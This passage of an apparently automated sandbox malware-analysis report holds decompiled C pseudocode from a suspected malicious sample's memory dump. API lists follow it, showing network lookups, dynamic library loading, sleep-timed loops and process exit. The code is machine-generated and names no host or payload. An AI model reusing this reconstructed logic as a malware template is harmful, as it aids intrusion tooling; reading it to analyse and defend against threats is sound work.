    				signed int* _t213;
    				signed int* _t215;
    				signed int* _t225;
    				signed int* _t230;
    				intOrPtr _t231;
    				signed int* _t232;
    				void* _t235;
    				int _t238;
    				signed int* _t239;
    				signed int _t240;
    				signed int _t255;
    				signed int _t256;
    				signed int _t271;
    				signed int _t272;
    				signed int* _t287;
    				signed int _t289;
    				signed int* _t292;
    				signed int _t293;
    				signed int* _t298;
    				signed int* _t302;
    				signed int* _t304;
    				signed int* _t306;
    				signed int* _t307;
    				signed int* _t308;
    				signed short* _t309;
    				intOrPtr _t312;
    				signed int _t314;
    				signed int _t321;
    				signed int* _t323;
    				signed int* _t324;
    				intOrPtr _t325;
    				signed int* _t327;
    				signed int* _t328;
    				void* _t329;
    				void* _t330;
    				void* _t331;
    				void* _t332;
    				void* _t333;
    				void* _t334;
    				void* _t335;
    
    				L0:
    				while(1) {
    					L0:
    					_t292 =  *( *((intOrPtr*)(_t142 + 0x20)) + _t240 * 4);
    					_t144 = L003C94D0(_t329 - 0x5c0,  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x1c)) + _t240 * 4)), _t292);
    					if(_t144 != 0) {
    						goto L4;
    					} else {
    						_t302 =  *0x3e8628; // 0x622508
    						 *(_t302[0x32])(0x3e8);
    					}
    					L63:
    					_t255 =  *0x3e857c; // 0x0
    					_t163 =  *((intOrPtr*)(_t329 - 0x5b8));
    					_t256 = 1 + _t255;
    					 *0x3e857c = _t256;
    					_t341 = _t256 -  *((intOrPtr*)(_t163 + 0x18));
    					if(_t256 <  *((intOrPtr*)(_t163 + 0x18))) {
    						do {
    							L0:
    							_t292 =  *( *((intOrPtr*)(_t142 + 0x20)) + _t240 * 4);
    							_t144 = L003C94D0(_t329 - 0x5c0,  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x1c)) + _t240 * 4)), _t292);
    							if(_t144 != 0) {
    								goto L4;
    							} else {
    								_t302 =  *0x3e8628; // 0x622508
    								 *(_t302[0x32])(0x3e8);
    							}
    							goto L63;
    						} while (_t256 <  *((intOrPtr*)(_t163 + 0x18)));
    						do {
    							goto L64;
    						} while ( *((intOrPtr*)( *((intOrPtr*)(_t329 - 0x5b8)) + 0x18)) <= _t237);
    						continue;
    					}
    					L64:
    					_t165 = E003E0A40(_t323, _t326, _t341, _t329 - 0xc, _t329 - 0x5b8);
    					_t335 = _t335 + 8;
    					if(_t165 == 0) {
    						_t343 =  *(_t329 - 0x20) - _t237;
    						if( *(_t329 - 0x20) == _t237) {
    							L003E0D30(_t237, _t323, _t326, _t343, _t329 - 0xc, _t329 - 0x5c0);
    							_t335 = _t335 + 8;
    						}
    					}
    					 *0x3e857c = 0;
    					 *(_t329 - 0x20) = _t237;
    					L4:
    					__imp___time64(_t235);
    					_t323 = _t292;
    					_t293 =  *0x3e857c; // 0x0
    					_t331 = _t330 + 4;
    					_t325 = _t144;
    					_t145 = _t144 -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t329 - 0x5b8)) + 0x24)) + _t293 * 8));
    					__eflags = _t145;
    					asm("sbb ebx, [ecx+edx*8+0x4]");
    					 *(_t329 - 0x48) = _t323;
    					if(__eflags < 0) {
    						L12:
    						_t237 = 0;
    						_t147 = E003D1B80(_t325, _t329 - 0xc, _t329 - 0x5c0, _t329 - 0x28);
    						_t332 = _t331 + 0xc;
    						__eflags = _t147;
    						if(_t147 == 0) {
    							L16:
    							 *(_t329 - 0x20) =  &(( *(_t329 - 0x20))[0]);
    							 *((intOrPtr*)( *((intOrPtr*)(_t329 - 0x5bc)) + 0xc)) =  *((intOrPtr*)(_t329 - 0x28));
    							_t150 = _t325 -  *((intOrPtr*)(_t329 - 0x3c));
    							__eflags = _t150;
    							asm("sbb edx, [ebp-0x38]");
    							 *(_t329 - 0x48) = _t323;
    							if(__eflags < 0) {
    								L21:
    								E003C42A0(__eflags, _t329 - 0x5c0);
    								_t333 = _t332 + 4;
    								_t152 = E003D12C0();
    								_push(4);
    								__eflags = _t152 - _t237;
    								if(__eflags >= 0) {
    									if(__eflags != 0) {
    										_push(_t329 - 0x9c0);
    										E003C9090(__eflags);
    										E003C9090(__eflags, _t329 - 0xdc0, 7);
    										_push(_t329 - 0xdc0);
    										_push(_t329 - 0x9c0);
    										_push(0xe);
    										_t298 = _t329 - 0x5c0;
    										_push(_t298);
    									} else {
    										_push(_t329 - 0x9c0);
    										E003C9090(__eflags);
    										E003C9090(__eflags, _t329 - 0xdc0, 6);
    										_push(_t329 - 0xdc0);
    										_t298 = _t329 - 0x9c0;
    										_push(_t298);
    										_push(0xe);
    										_push(_t329 - 0x5c0);
    									}
    								} else {
    									_push(_t329 - 0x9c0);
    									E003C9090(__eflags);
    									E003C9090(__eflags, _t329 - 0xdc0, 5);
    									_t298 = _t329 - 0xdc0;
    									_push(_t298);
    									_push(_t329 - 0x9c0);
    									_push(0xe);
    									_push(_t329 - 0x5c0);
    								}
    								_t156 = E003C5A10();
    								_t334 = _t333 + 0x20;
    								 *(_t329 - 0x48) = _t237;
    								do {
    									L27:
    									__imp___time64(0);
    									_t326 = _t156;
    									_t157 =  *0x3e8570; // 0x0
    									_t335 = _t334 + 4;
    									_t323 = _t298;
    									__eflags = _t157 - 2;
    									if(_t157 == 2) {
    										L31:
    										_t159 = E003C36E0(_t323, _t326, _t329 - 0xc, _t329 - 0x5c0,  *((intOrPtr*)(_t329 - 0x14)),  *(_t329 - 0x10));
    										_t335 = _t335 + 0x10;
    										asm("sbb edx, 0x0");
    										 *((intOrPtr*)(_t329 - 0x14)) = _t326 - 0x708;
    										 *(_t329 - 0x10) = _t323;
    										__eflags = _t159 - 1;
    										if(_t159 == 1) {
    											 *0x3e85ac = _t159;
    										}
    										L33:
    										_t161 = _t326 -  *(_t329 - 0x44);
    										__eflags = _t161;
    										asm("sbb ecx, [ebp-0x40]");
    										 *(_t329 - 0x5c) = _t323;
    										if(__eflags < 0) {
    											L40:
    											_t326 = _t326 -  *((intOrPtr*)(_t329 - 0x30));
    											__eflags = _t326;
    											asm("sbb edi, [ebp-0x2c]");
    											 *(_t329 - 0x5c) = _t323;
    											if(__eflags < 0) {
    												L47:
    												_t162 = E003C9890( *((intOrPtr*)(_t329 - 0x5bc)));
    												__eflags = _t162;
    												if(_t162 == 0) {
    													L62:
    													_t237 = 0;
    													__eflags = 0;
    													goto L63;
    												}
    												L48:
    												_push(1);
    												_push(_t329 - 0x5c0);
    												_t171 = E003C5A10();
    												_t335 = _t335 + 8;
    												__eflags = _t171;
    												if(__eflags == 0) {
    													goto L62;
    												}
    												L49:
    												_t298 = _t329 - 0x5c0;
    												_t172 = E003C7560(_t237, __eflags, _t298);
    												_t335 = _t335 + 4;
    												__eflags = _t172;
    												if(_t172 == 0) {
    													L61:
    													__eflags =  *0x3e85ac;
    													if( *0x3e85ac != 0) {
    														L67:
    														E003C1700(_t329 - 0xc);
    														E003CF850(_t237, _t329 - 0x5c0);
    														E003CC930(_t329 - 4);
    														_t238 = 0;
    														__eflags = 0;
    														__eflags =  *0x3e85ac - _t238; // 0x0
    														if(__eflags == 0) {
    															L81:
    															E003C9480();
    															E003C7E10();
    															ExitProcess(_t238);
    														} else {
    															L69:
    															_t304 =  *0x3e8628; // 0x622508
    															_t327 = 0;
    															 *((intOrPtr*)(_t329 - 0x70)) = 0;
    															 *((intOrPtr*)(_t329 - 0x6c)) = 0;
    															 *((intOrPtr*)(_t329 - 0x68)) = 0;
    															 *((intOrPtr*)(_t329 - 0x64)) = 0;
    															 *(_t329 - 0x18) = 0;
    															 *((intOrPtr*)(_t329 - 0xb8)) = 0x44;
    															 *(_t304[0x2e])(_t329 - 0xb8);
    															E003C8030(_t329 - 0x18);
    															_t180 = E003D1D90(0x20a, 0);
    															_t239 = _t180;
    															__eflags = _t239;
    															if(_t239 == 0) {
    																L80:
    																_t306 =  *0x3e8628; // 0x622508
    																 *(_t306[0x36])( *(_t329 - 0x18), _t327, _t327, _t327, _t327, _t327, _t327, _t239, _t329 - 0xb8, _t329 - 0x70);
    																_t307 =  *0x3e8628; // 0x622508
    																 *(_t307[0x3e])( *((intOrPtr*)(_t329 - 0x70)));
    																_t308 =  *0x3e8628; // 0x622508
    																 *(_t308[0x3e])( *((intOrPtr*)(_t329 - 0x6c)));
    																E003CBB40( *(_t329 - 0x18));
    																_t238 = 0;
    																__eflags = 0;
    																goto L81;
    															}
    															L70:
    															_t309 =  *(_t329 - 0x18);
    															_t328 = 0x104;
    															_t324 = 0;
    															__eflags = 0;
    															while(1) {
    																L71:
    																_t131 =  &(_t328[0x1fffffbe]); // 0x7ffffffe
    																__eflags = _t131;
    																if(_t131 == 0) {
    																	break;
    																}
    																L72:
    																_t271 =  *_t309 & 0x0000ffff;
    																__eflags = _t271;
    																if(_t271 == 0) {
    																	break;
    																}
    																L73:
    																 *_t180 = _t271;
    																_t180 =  &(_t180[0]);
    																_t309 =  &(_t309[1]);
    																_t328 = _t328 - 1;
    																__eflags = _t328;
    																if(_t328 != 0) {
    																	continue;
    																}
    																L74:
    																L76:
    																_t180 = _t180 - 2;
    																__eflags = _t180;
    																_t324 = 0x8007007a;
    																L77:
    																 *_t180 = 0;
    																__eflags = _t324;
    																if(_t324 >= 0) {
    																	_t189 =  *0x3e8628; // 0x622508
    																	 *(_t189[0x7a])(_t239);
    																}
    																_t327 = 0;
    																__eflags = 0;
    																goto L80;
    															}
    															L75:
    															__eflags = _t328;
    															if(_t328 != 0) {
    																goto L77;
    															}
    															goto L76;
    														}
    													}
    													goto L62;
    												}
    												L50:
    												__eflags =  *0x3e85ac;
    												if( *0x3e85ac != 0) {
    													goto L67;
    												}
    												L51:
    												_t191 =  *0x3e8584; // 0x0
    												_t326 = 0xa;
    												__eflags = _t191;
    												if(_t191 == 0) {
    													L53:
    													_t192 =  *(_t329 - 0x24);
    													__eflags = _t192;
    													if(_t192 <= 0) {
    														while(1) {
    															L55:
    															_t272 =  *0x3e8584; // 0x0
    															__eflags = _t272;
    															if(_t272 != 0) {
    																goto L57;
    															}
    															L56:
    															_t298 =  *0x3e8628; // 0x622508
    															 *(_t298[0x32])(0x4e20);
    															_t326 = _t326 - 1;
    															__eflags = _t326;
    															if(_t326 > 0) {
    																continue;
    															}
    															goto L57;
    														}
    														goto L57;
    													}
    													L54:
    													_t196 = _t192 - 1;
    													__eflags = _t196;
    													 *(_t329 - 0x24) = _t196;
    													_t326 = 1;
    													goto L55;
    												}
    												L52:
    												_t102 = _t326 - 5; // 0x5
    												_t192 = _t102;
    												 *0x3e8584 = 0;
    												goto L54;
    											}
    											L41:
    											if(__eflags > 0) {
    												L43:
    												_t326 = E003CF2D0(_t329 - 0x5c0);
    												_t198 = E003C99A0(_t237, _t329 - 0x19, _t323, _t197, _t197);
    												_push(8);
    												__eflags = _t198;
    												if(__eflags == 0) {
    													_push(_t329 - 0x9c0);
    													E003C9090(__eflags);
    													E003C9090(__eflags, _t329 - 0xdc0, 0xa);
    													_push(_t329 - 0xdc0);
    													_t312 = _t329 - 0x9c0;
    													_push(_t312);
    													_push(0xe);
    													_push(_t329 - 0x5c0);
    												} else {
    													_push(_t329 - 0x9c0);
    													E003C9090(__eflags);
    													E003C9090(__eflags, _t329 - 0xdc0, 9);
    													_t312 = _t329 - 0xdc0;
    													_push(_t312);
    													_push(_t329 - 0x9c0);
    													_push(0xe);
    													_push(_t329 - 0x5c0);
    												}
    												E003C5A10();
    												_t204 = E003CBB40(_t326);
    												__imp___time64(0);
    												_t335 = _t335 + 0x28;
    												 *((intOrPtr*)(_t329 - 0x30)) = _t204;
    												 *((intOrPtr*)(_t329 - 0x2c)) = _t312;
    												goto L47;
    											}
    											L42:
    											__eflags = _t326 - 0x7080;
    											if(_t326 <= 0x7080) {
    												goto L47;
    											}
    											goto L43;
    										}
    										L34:
    										if(__eflags > 0) {
    											L36:
    											_t314 =  *0x3e857c; // 0x0
    											_t210 = _t326 -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t329 - 0x5b8)) + 0x28)) + _t314 * 8));
    											__eflags = _t210;
    											_t237 = _t323;
    											asm("sbb ebx, [ecx+edx*8+0x4]");
    											 *(_t329 - 0x5c) = _t323;
    											if(__eflags < 0) {
    												goto L40;
    											}
    											L37:
    											if(__eflags > 0) {
    												L39:
    												 *(_t329 - 0x44) = _t326;
    												 *(_t329 - 0x40) = _t323;
    												_t212 = E003C1FE0(_t237, _t323, _t326, _t329 - 0xc, _t329 - 0x5c0, _t329 - 0x5b8);
    												_t335 = _t335 + 0xc;
    												__eflags = _t212;
    												if(_t212 != 0) {
    													L59:
    													_t213 = E003D0AD0(_t329 - 0x5c0,  *((intOrPtr*)( *((intOrPtr*)(_t329 - 0x5b8)) + 0x14)));
    													__eflags = _t213;
    													if(_t213 == 0) {
    														goto L67;
    													}
    													L60:
    													 *0x3e857c = 0;
    													goto L62;
    												}
    												goto L40;
    											}
    											L38:
    											__eflags = _t210 - 0x3840;
    											if(_t210 <= 0x3840) {
    												goto L40;
    											}
    											goto L39;
    										}
    										L35:
    										__eflags = _t161 - 0x4b0;
    										if(_t161 <= 0x4b0) {
    											goto L40;
    										}
    										goto L36;
    									}
    									L28:
    									_t215 = _t326 -  *((intOrPtr*)(_t329 - 0x14));
    									__eflags = _t215;
    									asm("sbb ecx, [ebp-0x10]");
    									 *(_t329 - 0x5c) = _t323;
    									if(__eflags < 0) {
    										goto L33;
    									}
    									L29:
    									if(__eflags > 0) {
    										goto L31;
    									}
    									L30:
    									__eflags = _t215 - 0xe10;
    									if(_t215 <= 0xe10) {
    										goto L33;
    									}
    									goto L31;
    									L57:
    									_t156 =  &(( *(_t329 - 0x48))[0]);
    									 *(_t329 - 0x48) = _t156;
    									__eflags = _t156 - 0x64;
    								} while (_t156 < 0x64);
    								goto L62;
    							}
    							L17:
    							if(__eflags > 0) {
    								L19:
    								_t225 = E003CAC90( *((intOrPtr*)(_t329 - 0x5b8)), _t329 - 0x5c0);
    								_t335 = _t332 + 8;
    								__eflags = _t225;
    								if(__eflags == 0) {
    									goto L63;
    								}
    								L20:
    								 *((intOrPtr*)(_t329 - 0x3c)) = _t325;
    								 *(_t329 - 0x38) = _t323;
    								goto L21;
    							}
    							L18:
    							__eflags = _t150 - 0xe10;
    							if(__eflags <= 0) {
    								goto L21;
    							}
    							goto L19;
    						}
    						L13:
    						__eflags = _t147 - 1;
    						if(__eflags != 0) {
    							E003CC870(_t329 - 0x5c0, _t147);
    							_t335 = _t332 + 8;
    						}
    						_t287 =  *0x3e8628; // 0x622508
    						 *(_t287[0x32])(0x3e8);
    						goto L63;
    					}
    					L5:
    					if(__eflags > 0) {
    						L7:
    						_t230 = E003CD890(_t325, __eflags, _t329 - 0xc, _t329 - 0x5c0, _t329 - 0x58);
    						_t331 = _t331 + 0xc;
    						__eflags = _t230;
    						if(_t230 == 0) {
    							L11:
    							_t231 =  *((intOrPtr*)( *((intOrPtr*)(_t329 - 0x5b8)) + 0x24));
    							_t289 =  *0x3e857c; // 0x0
    							 *((intOrPtr*)(_t231 + _t289 * 8)) = _t325;
    							_t321 =  *0x3e857c; // 0x0
    							 *(_t231 + 4 + _t321 * 8) = _t323;
    							goto L12;
    						}
    						L8:
    						__eflags = _t230 - 1;
    						if(_t230 != 1) {
    							E003CC870(_t329 - 0x5c0, _t230);
    							_t335 = _t331 + 8;
    						}
    						_t232 =  *0x3e8628; // 0x622508
    						 *(_t232[0x32])(0x3e8);
    						goto L62;
    					}
    					L6:
    					__eflags = _t145 - 0x3840;
    					if(__eflags <= 0) {
    						goto L12;
    					}
    					goto L7;
    				}
    			}


    APIs
    • _time64.MSVCRT ref: 003CFF16
      • Part of subcall function 003CD890: ??2@YAPAXI@Z.MSVCRT ref: 003CD8EA
      • Part of subcall function 003CD890: ??3@YAXPAX@Z.MSVCRT ref: 003CD929
      • Part of subcall function 003CD890: _time64.MSVCRT ref: 003CD94B
      • Part of subcall function 003CD890: ??3@YAXPAX@Z.MSVCRT ref: 003CD97B
      • Part of subcall function 003D1B80: ??2@YAPAXI@Z.MSVCRT ref: 003D1BAF
      • Part of subcall function 003D1B80: ??3@YAXPAX@Z.MSVCRT ref: 003D1BEE
      • Part of subcall function 003D1B80: _time64.MSVCRT ref: 003D1C10
      • Part of subcall function 003D1B80: ??3@YAXPAX@Z.MSVCRT ref: 003D1C3D
      • Part of subcall function 003CAC90: ??3@YAXPAX@Z.MSVCRT ref: 003CACCF
      • Part of subcall function 003CAC90: ??3@YAXPAX@Z.MSVCRT ref: 003CAE7A
      • Part of subcall function 003D12C0: WSAStartup.WS2_32(00000202,?), ref: 003D12E2
      • Part of subcall function 003D12C0: gethostname.WS2_32(?,000000FF), ref: 003D1302
      • Part of subcall function 003D12C0: getaddrinfo.WS2_32(?,00000000,00000000,00000000), ref: 003D1322
      • Part of subcall function 003D12C0: freeaddrinfo.WS2_32(00000000), ref: 003D1380
      • Part of subcall function 003D12C0: WSACleanup.WS2_32 ref: 003D1386
      • Part of subcall function 003C5A10: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,003CFE81), ref: 003C5ABF
    • _time64.MSVCRT ref: 003D0104
      • Part of subcall function 003C36E0: memcpy.MSVCRT ref: 003C3BC0
      • Part of subcall function 003C1FE0: ??2@YAPAXI@Z.MSVCRT ref: 003C2024
      • Part of subcall function 003C1FE0: ??3@YAXPAX@Z.MSVCRT ref: 003C20A1
      • Part of subcall function 003C1FE0: _time64.MSVCRT ref: 003C20D2
      • Part of subcall function 003C1FE0: ??3@YAXPAX@Z.MSVCRT ref: 003C20F9
      • Part of subcall function 003C99A0: WSAStartup.WS2_32(00000202,?), ref: 003C99CA
      • Part of subcall function 003C99A0: freeaddrinfo.WS2_32(?), ref: 003C9A2B
      • Part of subcall function 003C99A0: getaddrinfo.WS2_32(?,00000000,?,?), ref: 003C9AC6
      • Part of subcall function 003C99A0: freeaddrinfo.WS2_32(?), ref: 003C9B0E
      • Part of subcall function 003C99A0: WSACleanup.WS2_32 ref: 003C9B34
    • _time64.MSVCRT ref: 003D0280
      • Part of subcall function 003E0A40: ??2@YAPAXI@Z.MSVCRT ref: 003E0AC0
      • Part of subcall function 003E0A40: ??3@YAXPAX@Z.MSVCRT ref: 003E0B35
      • Part of subcall function 003E0A40: _time64.MSVCRT ref: 003E0B63
      • Part of subcall function 003E0A40: ??3@YAXPAX@Z.MSVCRT ref: 003E0B8B
      • Part of subcall function 003CF850: ??3@YAXPAX@Z.MSVCRT ref: 003CF90D
      • Part of subcall function 003CF850: ??3@YAXPAX@Z.MSVCRT ref: 003CF924
      • Part of subcall function 003CF850: ??3@YAXPAX@Z.MSVCRT ref: 003CF955
    • ExitProcess.KERNEL32 ref: 003D04F6
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
      • Part of subcall function 003C9480: FreeLibrary.KERNELBASE(00000000,003D04F0), ref: 003C94B1
      • Part of subcall function 003CC870: _itow.MSVCRT ref: 003CC889
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd

    Control-flow Graph

    C-Code - Quality: 56%
    			E003CFC18() {
    				int _t200;
    				int _t202;
    				int _t204;
    				void* _t210;
    				void* _t211;
    				signed int* _t216;
    				int _t225;
    				void* _t227;
    				long _t228;
    				intOrPtr _t229;
    				long _t230;
    				void* _t233;
    				long _t240;
    				int _t249;
    				long _t251;
    				long _t255;
    				long _t256;
    				long _t258;
    				long _t261;
    				void* _t263;
    				long _t267;
    				int _t268;
    				long _t270;
    				long _t272;
    				long _t273;
    				long _t274;
    				long _t275;
    				long _t279;
    				long _t280;
    				long _t284;
    				long _t286;
    				int _t292;
    				long _t298;
    				long _t300;
    				long _t301;
    				long _t303;
    				long _t313;
    				long _t318;
    				intOrPtr _t319;
    				int _t320;
    				signed int* _t334;
    				int _t336;
    				signed int _t351;
    				int _t355;
    				signed int _t369;
    				signed int _t385;
    				long _t390;
    				int _t405;
    				signed int _t407;
    				int _t419;
    				int _t420;
    				int _t422;
    				int _t423;
    				int _t424;
    				signed short* _t425;
    				int _t434;
    				signed int _t435;
    				int _t440;
    				int _t446;
    				signed int _t448;
    				signed int _t455;
    				int _t457;
    				int _t459;
    				void* _t460;
    				void* _t461;
    				void* _t463;
    				long _t464;
    				void* _t466;
    				void* _t467;
    				void* _t468;
    				void* _t471;
    				void* _t473;
    				void* _t474;
    				void* _t475;
    				void* _t480;
    
    				do {
    					_t336 =  *0x3e8628; // 0x622508
    					 *(_t466 - 0x14) =  *(_t466 - 0x14) +  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x30))))();
    					asm("adc [ebp-0x10], ecx");
    					Sleep(1); // executed
    				} while (_t461 - 1 > _t333);
    				_t200 =  *0x3e8628; // 0x622508
    				 *0x3e85dc = _t333;
    				 *0x3e85f8 = _t333;
    				 *0x3e85fc = _t333;
    				 *0x3e85c8 = _t333;
    				 *((intOrPtr*)( *((intOrPtr*)(_t200 + 0xbc))))(_t333, _t466 - 0x9c0, 0x200);
    				_t202 =  *0x3e8628; // 0x622508
    				 *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x1e8))))(_t466 - 0x9c0);
    				_t204 =  *0x3e8628; // 0x622508
    				 *((intOrPtr*)( *((intOrPtr*)(_t204 + 0x1d8))))(_t466 - 0x9c0);
    				SetCurrentDirectoryW(_t466 - 0x9c0);
    				_t419 =  *0x3e8628; // 0x622508
    				srand( *((intOrPtr*)( *((intOrPtr*)(_t419 + 0xd0))))());
    				_t468 = _t467 + 4; // executed
    				_t210 = E003CEB30(); // executed
    				_t211 = E003CBAF0(_t210);
    				_t478 = _t211;
    				if(_t211 == 0) {
    					L89:
    					_t480 =  *0x3e85ac - _t333; // 0x0
    					if(_t480 == 0) {
    						L102:
    						E003C9480();
    						E003C7E10();
    						ExitProcess(_t333);
    					}
    					_t420 =  *0x3e8628; // 0x622508
    					_t463 = 0;
    					 *((intOrPtr*)(_t466 - 0x70)) = 0;
    					 *((intOrPtr*)(_t466 - 0x6c)) = 0;
    					 *((intOrPtr*)(_t466 - 0x68)) = 0;
    					 *((intOrPtr*)(_t466 - 0x64)) = 0;
    					 *(_t466 - 0x18) = 0;
    					 *((intOrPtr*)(_t466 - 0xb8)) = 0x44;
    					 *((intOrPtr*)( *((intOrPtr*)(_t420 + 0xb8))))(_t466 - 0xb8);
    					E003C8030(_t466 - 0x18);
    					_t216 = E003D1D90(0x20a, 0);
    					_t334 = _t216;
    					if(_t334 == 0) {
    						L101:
    						_t422 =  *0x3e8628; // 0x622508
    						 *((intOrPtr*)( *((intOrPtr*)(_t422 + 0xd8))))( *(_t466 - 0x18), _t463, _t463, _t463, _t463, _t463, _t463, _t334, _t466 - 0xb8, _t466 - 0x70);
    						_t423 =  *0x3e8628; // 0x622508
    						 *((intOrPtr*)( *((intOrPtr*)(_t423 + 0xf8))))( *((intOrPtr*)(_t466 - 0x70)));
    						_t424 =  *0x3e8628; // 0x622508
    						 *((intOrPtr*)( *((intOrPtr*)(_t424 + 0xf8))))( *((intOrPtr*)(_t466 - 0x6c)));
    						E003CBB40( *(_t466 - 0x18));
    						_t333 = 0;
    						goto L102;
    					}
    					_t425 =  *(_t466 - 0x18);
    					_t464 = 0x104;
    					_t460 = 0;
    					while(1) {
    						_t187 = _t464 + 0x7ffffefa; // 0x7ffffffe
    						if(_t187 == 0) {
    							break;
    						}
    						_t351 =  *_t425 & 0x0000ffff;
    						if(_t351 == 0) {
    							break;
    						}
    						 *_t216 = _t351;
    						_t216 =  &(_t216[0]);
    						_t425 =  &(_t425[1]);
    						_t464 = _t464 - 1;
    						if(_t464 != 0) {
    							continue;
    						}
    						L97:
    						_t216 = _t216 - 2;
    						_t460 = 0x8007007a;
    						L98:
    						 *_t216 = 0;
    						if(_t460 >= 0) {
    							_t225 =  *0x3e8628; // 0x622508
    							 *((intOrPtr*)( *((intOrPtr*)(_t225 + 0x1e8))))(_t334);
    						}
    						_t463 = 0;
    						goto L101;
    					}
    					__eflags = _t464;
    					if(_t464 != 0) {
    						goto L98;
    					}
    					goto L97;
    				}
    				_t227 = E003C3500(_t466 - 4, _t478); // executed
    				_t479 = _t227;
    				if(_t227 == 0) {
    					 *(_t466 - 0x34) = _t333;
    					_t228 = GetCurrentProcess();
    					__imp__IsWow64Process(_t228, _t466 - 0x34);
    					__eflags = _t228;
    					if(_t228 != 0) {
    						E003CE7D0(_t466 - 0x9c0,  *(_t466 - 0x34)); // executed
    						_t468 = _t468 + 8;
    					}
    					_t229 = E003E1210();
    					_push(8);
    					 *0x3e8580 = _t229; // executed
    					L003CA47E(); // executed
    					_t468 = _t468 + 4;
    					__eflags = _t229 - _t333;
    					if(_t229 == _t333) {
    						_t465 = 0;
    						__eflags = 0;
    					} else {
    						_t465 = E003CE850(_t229);
    					}
    					_t230 = E003C3D50(_t465); // executed
    					__eflags = _t230;
    					if(_t230 != 0) {
    						__eflags = _t465 - _t333;
    						if(__eflags != 0) {
    							E003C2420(_t465);
    							_push(_t465);
    							L003C1CB0();
    							_t468 = _t468 + 4;
    						}
    						_t355 =  *0x3e8628; // 0x622508
    						 *0x3e8570 = _t333;
    						 *0x3e8584 = _t333;
    						 *0x3e8574 = _t333;
    						 *0x3e8578 = _t333;
    						 *((intOrPtr*)( *((intOrPtr*)(_t355 + 0xcc))))(0x3e8594, 0x800);
    						E003C1B20(_t466 - 0x5c0,  *((intOrPtr*)(_t355 + 0xcc)), __eflags);
    						_t233 = E003CBB30(_t466 - 0xc);
    						_push(0x34);
    						 *(_t466 - 0x58) = _t333;
    						 *(_t466 - 0x28) = _t333;
    						L003CA47E();
    						_t471 = _t468 + 4;
    						__eflags = _t233 - _t333;
    						if(__eflags == 0) {
    							 *(_t466 - 0x5b8) = _t333;
    						} else {
    							 *(_t466 - 0x5b8) = E003C70B0(_t233);
    						}
    						E003C9090(__eflags, _t466 - 0x9c0, 3);
    						E003CF550(_t466 - 0x50, _t333, _t466 - 0x9c0, 0xa, _t466 - 0x54, _t466 - 0x50);
    						E003C1F00(_t466 - 0xc,  *((intOrPtr*)(_t466 - 0x54)),  *((intOrPtr*)(_t466 - 0x50)));
    						_t240 = E003C69F0(_t466 - 0x5b8, _t466 - 0xc, _t466 - 0x5b8);
    						_t468 = _t471 + 0x24;
    						__eflags = _t240;
    						if(_t240 != 0) {
    							 *(_t466 - 0x5c0) = _t466 - 0xc;
    							__eflags = E003D0AD0(_t466 - 0x5c0,  *((intOrPtr*)( *(_t466 - 0x5b8) + 0x14)));
    							if(__eflags == 0) {
    								goto L18;
    							}
    							E003C5700( *((intOrPtr*)(_t466 - 0x5bc)), __eflags);
    							 *0x3e85ac = _t333;
    							 *(_t466 - 0x30) = _t333;
    							 *(_t466 - 0x2c) = _t333;
    							 *(_t466 - 0x14) = _t333;
    							 *(_t466 - 0x10) = _t333;
    							 *(_t466 - 0x3c) = _t333;
    							 *(_t466 - 0x38) = _t333;
    							 *(_t466 - 0x44) = _t333;
    							 *(_t466 - 0x40) = _t333;
    							 *((intOrPtr*)( *( *0x3e8628)))(_t333, _t333, E003E08A0, _t466 - 0x5c0, _t333, _t466 - 0x74);
    							 *(_t466 - 0x24) = _t333;
    							while(1) {
    								_t249 =  *(_t466 - 0x5b8);
    								_t369 = 0;
    								 *0x3e857c = 0;
    								 *(_t466 - 0x20) = _t333;
    								__eflags =  *((intOrPtr*)(_t249 + 0x18)) - _t333;
    								if(__eflags <= 0) {
    									goto L85;
    								}
    								do {
    									_t434 =  *( *((intOrPtr*)(_t249 + 0x20)) + _t369 * 4);
    									_t255 = L003C94D0(_t466 - 0x5c0,  *((intOrPtr*)( *((intOrPtr*)(_t249 + 0x1c)) + _t369 * 4)), _t434);
    									__eflags = _t255;
    									if(_t255 != 0) {
    										__imp___time64(_t333);
    										_t459 = _t434;
    										_t435 =  *0x3e857c; // 0x0
    										_t473 = _t468 + 4;
    										_t465 = _t255;
    										_t256 = _t255 -  *((intOrPtr*)( *((intOrPtr*)( *(_t466 - 0x5b8) + 0x24)) + _t435 * 8));
    										__eflags = _t256;
    										asm("sbb ebx, [ecx+edx*8+0x4]");
    										 *(_t466 - 0x48) = _t459;
    										if(__eflags < 0) {
    											L33:
    											_t333 = 0;
    											_t258 = E003D1B80(_t465, _t466 - 0xc, _t466 - 0x5c0, _t466 - 0x28);
    											_t468 = _t473 + 0xc;
    											__eflags = _t258;
    											if(_t258 == 0) {
    												 *(_t466 - 0x20) =  *(_t466 - 0x20) + 1;
